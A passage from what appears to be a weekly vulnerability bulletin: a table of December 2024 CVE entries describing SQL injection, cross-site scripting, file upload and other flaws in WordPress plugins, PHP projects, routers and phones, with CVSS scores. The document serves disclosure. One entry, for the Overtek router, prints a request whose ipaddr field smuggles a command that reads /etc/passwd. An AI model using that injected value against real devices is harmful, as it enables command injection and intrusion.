|---|---|---|---|---|
| 1000 Projects--Attendance Tracking Management System |
A vulnerability was found in 1000 Projects Attendance Tracking Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/faculty_action.php. The manipulation of the argument faculty_course_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-23 | 6.3 | CVE-2024-12898 |
| brainstormforce--Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) |
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' parameter in all versions up to, and including, 1.6.46 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-23 | 6.4 | CVE-2024-11230 |
| Huawei--HarmonyOS AILife Solution 6.0 |
Huawei HiLink AI Life product has an identity authentication bypass vulnerability. Successful exploitation of this vulnerability may allow attackers to access restricted functions.(Vulnerability ID:HWPSIRT-2022-42291) This vulnerability has been assigned a (CVE)ID:CVE-2022-48470 | 2024-12-28 | 4 | CVE-2022-48470 |
| Huawei--HUAWEI 4G Router B612 |
There is a NULL pointer dereference vulnerability in some Huawei products. An attacker may send specially crafted POST messages to the affected products. Due to insufficient validation of some parameter in the message, successful exploit may cause some process abnormal. (Vulnerability ID: HWPSIRT-2017-10105) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9085. | 2024-12-27 | 5.3 | CVE-2020-9085 |
| Huawei--HUAWEI 4G Router B612 |
There is a buffer error vulnerability in some Huawei product. An unauthenticated attacker may send special UPNP message to the affected products. Due to insufficient input validation of some value, successful exploit may cause some service abnormal. (Vulnerability ID: HWPSIRT-2017-08234) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9086. | 2024-12-27 | 4.3 | CVE-2020-9086 |
| Huawei--HUAWEI Mate 30 |
There is an out-of-bound read and write vulnerability in Huawei smartphone. A module dose not verify the input sufficiently. Attackers can exploit this vulnerability by modifying some configuration to cause out-of-bound read and write, causing denial of service. (Vulnerability ID: HWPSIRT-2020-05103) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9211. | 2024-12-27 | 6.4 | CVE-2020-9211 |
| Huawei--Lion-AL00C |
There is a stack overflow vulnerability in some Huawei smart phone. An attacker can craft specific packet to exploit this vulnerability. Due to insufficient verification, this could be exploited to tamper with the information to affect the availability. (Vulnerability ID: HWPSIRT-2019-11030) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9253. | 2024-12-27 | 6.3 | CVE-2020-9253 |
| Huawei--Myna |
There is an insufficient integrity vulnerability in Huawei products. A module does not perform sufficient integrity check in a specific scenario. Attackers can exploit the vulnerability by physically install malware. This could compromise normal service of the affected device. (Vulnerability ID: HWPSIRT-2020-00145) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9210. | 2024-12-27 | 6.8 | CVE-2020-9210 |
| Intelbras--VIP S3020 G2 |
A vulnerability was found in Intelbras VIP S3020 G2, VIP S4020 G2, VIP S4020 G3 and VIP S4320 G2 up to 20241222. It has been classified as critical. This affects an unknown part of the file ../mtd/Config/Sha1Account1 of the component Web Interface. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-23 | 4.3 | CVE-2024-12897 |
| n/a -- n/a |
A connection hijacking vulnerability exists in some Huawei home routers. Successful exploitation of this vulnerability may cause DoS or information leakage.(Vulnerability ID:HWPSIRT-2023-34408) This vulnerability has been assigned a (CVE)ID:CVE-2023-52718 | 2024-12-28 | 6.4 | CVE-2023-52718 |
| n/a -- n/a |
The Booking Calendar WpDevArt plugin is vulnerable to time-based, blind SQL injection via the `id` parameter in the "wpdevart_booking_calendar" shortcode in versions up to, and including, 3.2.19 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. The vulnerability requires the "delete_prev_date" theme option being enabled. This makes it possible for authenticated attackers, with contributor-level access or above, to append additional SQL queries into already existing query that can be used to extract sensitive information such as passwords from the database. | 2024-12-24 | 6.5 | CVE-2024-10856 |
| n/a -- n/a |
The Jetpack WordPress plugin before 14.1 does not properly checks the postmessage origin in its 13.x versions, allowing it to be bypassed and leading to DOM-XSS. The issue only affects websites hosted on WordPress.com. | 2024-12-25 | 6.1 | CVE-2024-10858 |
| n/a -- n/a |
The Appointment Booking Calendar Plugin and Scheduling Plugin - BookingPress plugin for WordPress is vulnerable to SQL Injection via the 'category' parameter of the 'bookingpress_form' shortcode in all versions up to, and including, 1.1.21 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-24 | 6.5 | CVE-2024-11726 |
| n/a -- n/a |
The NinjaTeam Chat for Telegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'njtele_button shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-11885 |
| n/a -- n/a |
The Text Prompter - Unlimited chatgpt text prompts for openai tasks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'text_prompter' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-11896 |
| n/a -- n/a |
The Advanced Floating Content plugin for WordPress is vulnerable to SQL Injection via the 'floating_content_duplicate_post' function in all versions up to, and including, 3.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-24 | 6.5 | CVE-2024-12031 |
| n/a -- n/a |
The Tourfic - Ultimate Hotel Booking, Travel Booking & Apartment Booking WordPress Plugin | WooCommerce Booking plugin for WordPress is vulnerable to SQL Injection via the 'enquiry_id' parameter of the 'tf_enquiry_reply_email_callback' function in all versions up to, and including, 2.15.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-25 | 6.5 | CVE-2024-12032 |
| n/a -- n/a |
The Exhibit to WP Gallery WordPress plugin through 0.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2024-12-24 | 6.1 | CVE-2024-12096 |
| n/a -- n/a |
The Bitcoin Lightning Publisher for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-24 | 6.1 | CVE-2024-12100 |
| n/a -- n/a |
The The Ninja Forms - The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.8.22. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. | 2024-12-29 | 6.3 | CVE-2024-12238 |
| n/a -- n/a |
The ELEX WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the elex_dp_export_rules() and elex_dp_import_rules() functions in all versions up to, and including, 2.1.7. This makes it possible for unauthenticated attackers to import and export product rules along with obtaining phpinfo() data | 2024-12-24 | 6.5 | CVE-2024-12266 |
| n/a -- n/a |
The Responsive Blocks - WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'responsive-block-editor-addons/portfolio' block in all versions up to, and including, 1.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-12268 |
| n/a -- n/a |
The Export Customers Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 't' parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-24 | 6.1 | CVE-2024-12405 |
| n/a -- n/a |
The WP Datepicker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpdp_get_selected_datepicker' parameter in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-24 | 6.1 | CVE-2024-12468 |
| n/a -- n/a |
The Optio Dentistry plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'optio-lightbox' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-12507 |
| n/a -- n/a |
The ShMapper by Teplitsa plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shmMap' shortcode in all versions up to, and including, 1.4.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-12518 |
| n/a -- n/a |
The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_cart_button' and 'wp_cart_display_product' shortcodes in all versions up to, and including, 5.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-12622 |
| n/a -- n/a |
The WP-Appbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-24 | 6.1 | CVE-2024-12710 |
| n/a -- n/a |
The Loan Comparison plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'loancomparison' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-12814 |
| n/a -- n/a |
Delinea addressed a reported case on Secret Server v11.7.31 (protocol handler version 6.0.3.26) where, within the protocol handler function, URI's were compared before normalization and canonicalization, potentially leading to over matching against the approved list. If this attack were successfully exploited, a remote attacker may be able to convince a user to visit a malicious web-page, or open a malicious document which could trigger the vulnerable handler, allowing them to execute arbitrary code on the user's machine. Delinea added additional validation that the downloaded installer's batch file was in the expected format. | 2024-12-26 | 6.9 | CVE-2024-12908 |
| n/a -- n/a |
A vulnerability classified as critical was found in Codezips Project Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/forms/advanced.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-25 | 6.3 | CVE-2024-12926 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in code-projects Simple Admin Panel 1.0. This affects an unknown part. The manipulation of the argument c_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12928 |
| n/a -- n/a |
A vulnerability has been found in code-projects Student Management System 1.0.00 and classified as critical. This vulnerability affects unknown code of the file /addCatController.php. The manipulation of the argument size leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12929 |
| n/a -- n/a |
A vulnerability was found in code-projects Simple Admin Panel 1.0. It has been classified as critical. Affected is an unknown function of the file /addCatController.php. The manipulation of the argument size leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12931 |
| n/a -- n/a |
A vulnerability classified as critical has been found in code-projects Simple Admin Panel 1.0. This affects an unknown part of the file updateItemController.php. The manipulation of the argument p_desk leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12934 |
| n/a -- n/a |
A vulnerability classified as critical was found in code-projects Simple Admin Panel 1.0. This vulnerability affects unknown code of the file editItemForm.php. The manipulation of the argument record leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12935 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in code-projects Simple Admin Panel 1.0. This issue affects some unknown processing of the file catDeleteController.php. The manipulation of the argument record leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12936 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in code-projects Simple Admin Panel 1.0. Affected is an unknown function of the file addVariationController.php. The manipulation of the argument qty leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12937 |
| n/a -- n/a |
A vulnerability has been found in code-projects Simple Admin Panel 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file updateOrderStatus.php. The manipulation of the argument record leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12938 |
| n/a -- n/a |
A vulnerability was found in code-projects Job Recruitment 1.0. It has been rated as critical. This issue affects the function add_edu of the file /_parse/_all_edits.php. The manipulation of the argument degree leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-26 | 6.3 | CVE-2024-12939 |
| n/a -- n/a |
A vulnerability was found in CodeAstro Blood Donor Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /pages/deletedannounce.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12941 |
| n/a -- n/a |
A vulnerability was found in Codezips Hospital Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /invo.php. The manipulation of the argument dname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-26 | 6.3 | CVE-2024-12947 |
| n/a -- n/a |
A vulnerability was found in code-projects Travel Management System 1.0. It has been classified as critical. This affects an unknown part of the file /detail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12948 |
| n/a -- n/a |
A vulnerability was found in code-projects Travel Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /package.php. The manipulation of the argument subcatid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12949 |
| n/a -- n/a |
A vulnerability was found in code-projects Travel Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /subcat.php. The manipulation of the argument catid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12950 |
| n/a -- n/a |
A vulnerability classified as critical has been found in 1000 Projects Portfolio Management System MCA 1.0. Affected is an unknown function of the file /add_personal_details.php. The manipulation of the argument profile leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12951 |
| n/a -- n/a |
A vulnerability classified as critical was found in melMass comfy_mtb up to 0.1.4. Affected by this vulnerability is the function run_command of the file comfy_mtb/endpoint.py of the component Dependency Handler. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6e004cce2c32f8e48b868e66b89f82da4887dc3. It is recommended to apply a patch to fix this issue. | 2024-12-26 | 6.3 | CVE-2024-12952 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in 1000 Projects Portfolio Management System MCA 1.0. Affected by this issue is some unknown functionality of the file /update_pd_process.php. The manipulation of the argument profile leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12953 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in 1000 Projects Portfolio Management System MCA 1.0. This affects an unknown part of the file /update_ach.php. The manipulation of the argument ach_certy leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12954 |
| n/a -- n/a |
A vulnerability was found in 1000 Projects Portfolio Management System MCA 1.0 and classified as critical. This issue affects some unknown processing of the file /add_achievement_details.php. The manipulation of the argument ach_certy leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 6.3 | CVE-2024-12956 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in PHPGurukul Complaint Management System 1.0. This affects an unknown part of the file /admin/state.php. The manipulation of the argument state leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-27 | 6.3 | CVE-2024-12977 |
| n/a -- n/a |
A vulnerability was found in CodeAstro Car Rental System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /bookingconfirm.php. The manipulation of the argument driver_id_from_dropdown leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-27 | 6.3 | CVE-2024-12981 |
| n/a -- n/a |
A vulnerability classified as critical was found in Overtek OT-E801G OTE801G65.1.1.0. This vulnerability affects unknown code of the file /diag_ping.cmd?action=test&interface=ppp0.1&ipaddr=8.8.8.8%26%26cat%20/etc/passwd&ipversion=4&sessionKey=test. The manipulation leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-27 | 6.3 | CVE-2024-12985 |
| n/a -- n/a |
A vulnerability was found in running-elephant Datart 1.0.0-rc3. It has been rated as critical. Affected by this issue is the function extractModel of the file /import of the component File Upload. The manipulation of the argument file leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-28 | 6.3 | CVE-2024-12994 |
| n/a -- n/a |
A vulnerability has been found in PHPGurukul Small CRM 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/edit-user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-12999 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Small CRM 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/quote-details.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13000 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Small CRM 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/index.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13001 |
| n/a -- n/a |
A vulnerability was found in 1000 Projects Portfolio Management System MCA 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /update_ed.php. The manipulation of the argument e_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13003 |
| n/a -- n/a |
A vulnerability classified as critical was found in 1000 Projects Attendance Tracking Management System 1.0. This vulnerability affects unknown code of the file /admin/attendance_action.php. The manipulation of the argument attendance_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13005 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in Codezips Event Management System 1.0. Affected is an unknown function of the file /contact.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13007 |
| n/a -- n/a |
A vulnerability has been found in code-projects Responsive Hotel Site 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/newsletter.php. The manipulation of the argument eid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13008 |
| n/a -- n/a |
A vulnerability has been found in PHPGurukul Maid Hiring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/search-maid.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13014 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Maid Hiring Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/edit-category.php. The manipulation of the argument editid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13016 |
| n/a -- n/a |
A vulnerability classified as critical was found in code-projects Chat System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/chatroom.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13020 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in taisan tarzan-cms 1.0.0. This affects the function UploadResponse of the file src/main/java/com/tarzan/cms/modules/admin/controller/common/UploadController.java of the component Article Management. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13022 |
| n/a -- n/a |
A vulnerability was found in Codezips Blood Bank Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /campaign.php. The manipulation of the argument cname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-29 | 6.3 | CVE-2024-13024 |
| n/a -- n/a |
A vulnerability was found in Codezips College Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /Front-end/faculty.php. The manipulation of the argument book_name/book_author leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 6.3 | CVE-2024-13025 |
| n/a -- n/a |
IBM Engineering Lifecycle Optimization - Engineering Insights 7.0.2 and 7.0.3 uses a web link with untrusted references to an external site. A remote attacker could exploit this vulnerability to expose sensitive information or perform unauthorized actions on the victims' web browser. | 2024-12-25 | 6.1 | CVE-2024-39727 |
| n/a -- n/a |
Some Honor products are affected by file writing vulnerability, successful exploitation could cause code execution | 2024-12-26 | 6.3 | CVE-2024-47151 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 6.2 | CVE-2024-47153 |
| n/a -- n/a |
Dell NativeEdge, version(s) 2.1.0.0, contain(s) a Creation of Temporary File With Insecure Permissions vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Information disclosure. | 2024-12-25 | 6.5 | CVE-2024-52543 |
| n/a -- n/a |
Home-Gallery.org is a self-hosted open-source web gallery to browse personal photos and videos. In 1.15.0 and earlier, an open CORS policy in app.js may allow an attacker to view the images of home-gallery when it is using the default settings. The following express middleware allows any website to make a cross site request to home-gallery, thus allowing them to read any endpoint on home-gallery. Home-gallery is mostly safe from cross-site requests due to most of its pages requiring JavaScript, and cross-site requests such as fetch() do not render javascript. If an attacker is able to get the path of the preview images which are randomized, an attacker will be able to view such a photo. If any static files or endpoints are introduced in the future that contain sensitive information, they will be accessible to an attacker website. | 2024-12-23 | 6.1 | CVE-2024-53276 |
| n/a -- n/a |
OpenFHE through 1.2.3 has a NULL pointer dereference in BinFHEContext::EvalFloor in lib/binfhe-base-scheme.cpp. | 2024-12-25 | 6.5 | CVE-2024-56430 |
| n/a -- n/a |
The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tracking code field in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-24 | 6.4 | CVE-2024-8721 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 6.2 | CVE-2024-8993 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 6.2 | CVE-2024-8994 |
| n/a -- n/a |
The DirectoryPress - Business Directory And Classified Ad Listing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.6.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. When DirectoryPress Frontend is installed, this can be exploited by unauthenticated users. | 2024-12-24 | 5.4 | CVE-2024-10584 |
| n/a -- n/a |
The WP-SVG WordPress plugin through 0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-12-27 | 5.9 | CVE-2024-11644 |
| n/a -- n/a |
The Advanced Google reCAPTCHA plugin for WordPress is vulnerable to IP unblocking in all versions up to, and including, 1.25. This is due to the plugin not utilizing a strong unique key when generating an unblock request. This makes it possible for unauthenticated attackers to unblock their IP after being locked out due to too many bad password attempts | 2024-12-24 | 5.3 | CVE-2024-12034 |
| n/a -- n/a |
The Content No Cache: prevent specific content from being cached plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 0.1.2 via the eos_dyn_get_content action due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2024-12-24 | 5.3 | CVE-2024-12103 |
| n/a -- n/a |
The MarketKing - Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions like 'marketking_delete_team_member', 'marketkingrejectuser', 'marketking_save_profile_settings', and many more in all versions up to, and including, 2.0.00. This makes it possible for unauthenticated attackers to delete users, update settings, approve users, and more. | 2024-12-25 | 5.3 | CVE-2024-12413 |
| n/a -- n/a |
The WC Price History for Omnibus plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and modify history data. | 2024-12-24 | 5.4 | CVE-2024-12617 |
| n/a -- n/a |
A vulnerability classified as problematic has been found in Amcrest IP2M-841B, IP2M-841W, IPC-IP2M-841B, IPC-IP3M-943B, IPC-IP3M-943S, IPC-IP3M-HX2B and IPC-IPM-721S up to 20241211. This affects an unknown part of the file /web_caps/webCapsConfig of the component Web Interface. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-27 | 5.3 | CVE-2024-12984 |
| n/a -- n/a |
A vulnerability was found in WISI Tangram GT31 up to 20241214 and classified as problematic. Affected by this issue is some unknown functionality of the component HTTP Request Handler. The manipulation leads to server-side request forgery. The attack may be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-27 | 5.3 | CVE-2024-12989 |
| n/a -- n/a |
Signing cookies is an application security feature that adds a digital signature to cookie data to verify its authenticity and integrity. The signature helps prevent malicious actors from modifying the cookie value, which can lead to security vulnerabilities and exploitation. Apache Hive's service component accidentally exposes the signed cookie to the end user when there is a mismatch in signature between the current and expected cookie. Exposing the correct cookie signature can lead to further exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive by HIVE-9710 (1.2.0) and in Apache Spark by SPARK-14987 (2.0.0). The affected components are the following: * org.apache.hive:hive-service * org.apache.spark:spark-hive-thriftserver_2.11 * org.apache.spark:spark-hive-thriftserver_2.12 | 2024-12-23 | 5.9 | CVE-2024-23945 |
| n/a -- n/a |
IBM Engineering Lifecycle Optimization - Engineering Insights 7.0.2 and 7.0.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2024-12-25 | 5.3 | CVE-2024-39725 |
| n/a -- n/a |
IBM AIX 7.2, 7.3, VIOS 3.1, and 4.1 could allow a non-privileged local user to exploit a vulnerability in the AIX perfstat kernel extension to cause a denial of service. | 2024-12-25 | 5.5 | CVE-2024-47102 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 5.5 | CVE-2024-47154 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 5.5 | CVE-2024-47155 |
| n/a -- n/a |
Dell ECS, version(s) prior to ECS 3.8.1.3, contain(s) an Authentication Bypass by Capture-replay vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Session theft. | 2024-12-25 | 5.4 | CVE-2024-52534 |
| n/a -- n/a |
